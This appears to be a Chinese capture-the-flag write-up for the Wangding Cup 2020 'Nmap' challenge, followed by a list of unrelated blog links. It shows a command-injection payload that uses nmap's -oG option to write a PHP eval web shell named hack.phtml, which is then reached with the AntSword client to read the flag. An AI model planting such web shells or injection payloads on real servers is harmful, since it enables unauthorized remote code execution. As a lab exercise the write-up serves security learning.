命令执行 [网鼎杯 2020 朱雀组]Nmap1

打开题目

输入127.0.0.1

可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令

127.0.0.1 | ls

可以看到|\转义,尝试使用;

直接放入Payload:

' <?php @eval($_POST["hack"]);?> -oG hack.php '

尝试修改文件名后缀为phtml

' <?php @eval($_POST["hack"]);?> -oG hack.phtml '

加上扫描的地址:127.0.0.1

127.0.0.1 | ' <?= @eval($_POST["hack"]);?> -oG hack.phtml'

得到

查看扫描列表:

查看写入的文件,即访问hack.phtml

蚁剑连接

在根目录找到了flag

相关推荐
O***P5715 分钟前
【MySQL】MySQL内置函数--日期函数字符串函数数学函数其他相关函数
android·mysql·adb
z***438413 分钟前
MySQL-mysql zip安装包配置教程
android·mysql·adb
无心水1 小时前
【Python实战进阶】7、Python条件与循环实战详解:从基础语法到高级技巧
android·java·python·python列表推导式·python条件语句·python循环语句·python实战案例
g***78912 小时前
鸿蒙NEXT(五):鸿蒙版React Native架构浅析
android·前端·后端
Bervin121388 小时前
Flutter Android环境的搭建
android·flutter
e***877015 小时前
windows配置永久路由
android·前端·后端
fouryears_2341716 小时前
现代 Android 后台应用读取剪贴板最佳实践
android·前端·flutter·dart
YF021117 小时前
Frida for MacBook/Android 安装配置
android·前端
雨白17 小时前
Android实战:构建高可维护的日志系统
android
茄子凉心19 小时前
android 开机启动App
android·java·开发语言